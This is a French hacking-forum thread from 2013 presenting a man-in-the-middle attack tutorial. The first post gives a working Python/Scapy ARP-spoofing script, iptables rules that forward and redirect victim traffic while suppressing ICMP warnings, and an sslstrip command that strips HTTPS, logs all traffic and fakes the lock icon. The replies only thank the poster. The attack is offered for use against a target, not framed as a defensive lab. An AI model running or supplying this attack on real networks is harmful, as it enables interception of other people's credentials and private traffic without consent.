FranceHack Index du Forum
S’enregistrerRechercherFAQMembresGroupesConnexion
Attaque MITM (man in the middle)

 
Répondre au sujet    FranceHack Index du Forum » Hacking » Tutoriel Sujet précédent
Sujet suivant
Attaque MITM (man in the middle)
Auteur Message
process_47
Invité

Hors ligne




Message Attaque MITM (man in the middle) Répondre en citant
Bonjour à tous, je vais vous présenter une façon de faire une attaque de type man in the middle:


Etape 1: empoisonnement du cache arp.


Vous pouvez utiliser des logiciels tel que arpspoof ou alors ecrire vous même un petit script qui remplacera ce dernier...
Je vais vous présenter celui que j'ai ecrit de façon a ce que vous puissiez ecrire le votre par la suite:
Il vous faut un interpreteur python et Scapy.
(installation de scapy sous linux ubuntu: sudo apt-get install python-scapy)


#! /usr/bin/python
import sys
import time
from scapy.all import *


#--------------Gestion des arguments-------------#
if(len(sys.argv) > 2):
ip_cible=sys.argv[1]
ip_routeur=sys.argv[2]
else:
print("[ERREUR] Modele de base:\"#./macIsmine <ip_cible> <ip_routeur> <intervale>\"")
sys.exit(1)


if(len(sys.argv) > 3):
duree_sec=sys.argv[3]
else:
duree_sec=2


#-------------Creation du paquet--------------#
mac_hack='00:22:5a:00:f6:4b'


arp1=ARP()
arp1.pdst=ip_cible
arp1.psrc=ip_routeur
arp1.hwsrc=mac_hack
arp1.op="is-at"


pack1=Ether(dst=getmacbyip(ip_cible),src=mac_hack)/arp1
print("[DIANA] Debut de l'attaque sur l'hote "+ip_cible)


#--------------------Boucle principale----------------------#
while (1):
print("\n[DIANA] [ARP: "+ip_routeur+" is-at "+mac_hack+"]...")
sendp(pack1)
time.sleep(duree_sec)





Comme vous pouvez le constater, le programme est divisé en 3 parties:


La première partie gère les arguments passé en ligne de commande, il en faut obligatoirement deux sans quoi le programme s'arrête et eventuellement un troisieme optionnel.
Le premier est l'adresse ip de la cible, le second l'adresse ip du routeur et enfin le troisieme le délai entre chaque envoie de paquets (secondes).
exemple: utilisateur@ordinateur# ./macIsmine 192.168.1.6 192.168.1.1 2


La seconde partie gère la création du paquet arp, on lui ajoute l'ip cible et routeur mais aussi notre propre adresse mac (avec la variable mac_hack).
On forge ensuite le paquet en lui ajoutant un en-tête Ethernet dans lequel on spécifie une adresse mac de destination que l'on retrouve grace à la fonction getmacbyip à laquelle on envoie en argument l'ip cible (cette fonction va envoyer un paquet arp de type "who-has" et récuperer l'adresse mac de la cible).


La troisieme parte gère la boucle principale qui va envoyer un paquet puis attendre un certain délai, renvoyer un paquet et ainsi de suite... (ctrl+c pour interrompre le script)


Etape 2: reglage du parefeu Linux.


Il est necessaire de regler le parfeu pour la redirection des paquets car sinon ces derniers resteront bloqués sur votre ordinateur! Le procédé s'articule en quatre ligne de commande:


echo '1' > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 15000
iptables -A OUTPUT -p ICMP -j DROP
iptables -A OUTPUT -p ICMPv6 -j DROP


La premiere ligne autorise tout simplement la redirection de paquet sur votre ordinateur en plaçant la valeur 1 dans le fichier ip_foward.
La seconde ligne redirige le trafic entrant sur le port 80 vers le port 15000 (vous etes libre de choisir ce port).
La trosieme et quatrieme bloque l'emission de paquets ICMP ou ICMPv6 par votre ordinateur pour éviter qu'il ne prévienne l'ordinateur cible que la route qu'il empreinte n'est pas la bonne !


Etape 3: ecoute du réseau.


Dans l'idée ou https ne serait jamais utiliser, on pourrait se contenter d'utiliser wireshark or ce n'est pas le cas. On va donc devoir faire appel a SSLstrip, ce logiciel se fixe sur un port et "converti" les paquets https en paquet http. De plus, il logue tout le trafic !


Voici comment l'utiliser:


sslstrip -f -a -l 15000 -w jour1.log


-l : choix du port (il doit etre le même que le port choisi pour la redirection du port 80).
-w : est le fichier ou sslstrip logue tout le traffic.
-f : permet d'afficher l'icone du cadenas (illusion de protection)


Vous pouvez l'installer comme ceci: sudo apt-get install sslstrip
Voila! Je vous laisse mon script à disposition ;)
Bonne continuation.


Lun 29 Avr - 20:04 (2013)
Publicité






Message Publicité
PublicitéSupprimer les publicités ?

Lun 29 Avr - 20:04 (2013)
Groscalin
Invité

Hors ligne




Message Attaque MITM (man in the middle) Répondre en citant
Bon, je doute que le tuto soit de toi, mais bravo pour le post et merci, ça c'est des trucs utiles. (J'utilise arpspoof aussi)


Jeu 2 Mai - 19:45 (2013)
process_47
Invité

Hors ligne




Message Attaque MITM (man in the middle) Répondre en citant
Cc ce tuto est bien de moi pour le script (que j'ai moi mm écrit) et pour les règles sur les paquets ICMP dans iptable, après je t'avoue que le reste est le fruit de mes lectures d'autres tutoriels: eh oui ! Je n'ai pas écrit SSLstrip ;)
Bye.


Ven 3 Mai - 08:35 (2013)
Groscalin
Invité

Hors ligne




Message Attaque MITM (man in the middle) Répondre en citant
Daccord, alors merci pour le tuto xD


Ven 3 Mai - 16:18 (2013)
Contenu Sponsorisé






Message Attaque MITM (man in the middle)

Aujourd’hui à 06:05 (2016)
Montrer les messages depuis:    
Répondre au sujet    FranceHack Index du Forum » Hacking » Tutoriel Toutes les heures sont au format GMT + 2 Heures
Page 1 sur 1

 

Portail | Index | créer un forum gratuit | Forum gratuit d’entraide | Annuaire des forums gratuits | Signaler une violation | Conditions générales d'utilisation
Powered by phpBB © 2001, 2005 phpBB Group
Design by Freestyle XL / Music Lyrics.Traduction par : phpBB-fr.com